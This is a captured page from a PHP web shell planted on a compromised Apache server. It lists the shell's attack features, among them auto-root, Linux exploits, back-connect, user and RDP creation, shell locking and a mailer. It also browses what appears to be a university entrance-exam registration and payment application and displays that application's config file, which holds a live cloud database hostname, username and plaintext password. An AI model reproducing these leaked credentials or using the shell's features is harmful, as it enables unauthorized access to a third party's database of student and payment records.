Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 3.12.153.240
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
demo /
rcubpgcet /
[ HOME SHELL ]
Name
Size
Permission
Action
css
[ DIR ]
drwxrwxr-x
img
[ DIR ]
drwxrwxr-x
js
[ DIR ]
drwxrwxr-x
libs
[ DIR ]
drwxrwxr-x
links
[ DIR ]
drwxrwxr-x
reg_soon_files
[ DIR ]
drwxrwxr-x
src
[ DIR ]
drwxrwxr-x
student_photos
[ DIR ]
drwxrwxr-x
tarka_pdf
[ DIR ]
drwxrwxr-x
tarka_pdf_latest
[ DIR ]
drwxrwxr-x
app.php
427
B
-rw-rw-r--
cconfig.php
1.21
KB
-rw-rw-r--
enable_app_status.php
3.48
KB
-rw-rw-r--
enable_payment.php
3.4
KB
-rw-rw-r--
hall_ticket.php
2.98
KB
-rw-rw-r--
index.php
2.29
KB
-rw-rw-r--
make_payment.php
2.79
KB
-rw-rw-r--
notif.pdf
269.58
KB
-rw-rw-r--
payment_gate_way_responce.php
7.31
KB
-rw-rw-r--
payment_gateway.php
2.49
KB
-rw-rw-r--
print_app_form.php
3.45
KB
-rw-rw-r--
reg_soon.htm
23.92
KB
-rw-rw-r--
registration.php
724
B
-rw-rw-r--
vpc_php_serverhost_do.php
6.69
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : cconfig.php
<?php define("APP_LANDPAGE_G","app.php"); define("APP_PATH_G", dirname($_SERVER["SCRIPT_FILENAME"])); define("APP_SRC_G", APP_PATH_G . "/src"); define("APP_LIB_G", APP_PATH_G . "/libs"); define("APP_DB_G", APP_LIB_G . "/adodb5"); class CConfig { public $mstr_host; public $mstr_user; public $mstr_password; public $mstr_db; public $mbool_debug; function __construct($abool_debug = false) { $this->mstr_host = "logisys.cluster-cv9maxyrxjgg.ap-south-1.rds.amazonaws.com"; $this->mstr_user = "admin"; $this->mstr_password = "T0g3th3r@all"; $this->mstr_db = "rcu_pgcet"; $this->mbool_debug = $abool_debug; ini_set("magic_quotes_gpc", 0); } static function GetSystemDate($aobj_context) { $get_date="select date_add(date_add(now(),INTERVAL 13 hour),interval 30 minute) as now_date"; $obj=$aobj_context->mobj_db->GetRow($get_date); return $obj[now_date]; } static function CreateNewDbContext() { require_once("src/customappcontext.php"); $live_aobj_context=new LiveContext(); $live_aobj_context->Initialize(); $live_aobj_context->mobj_db->SetFetchMode(ADODB_FETCH_ASSOC); return $live_aobj_context; } } ?>
Close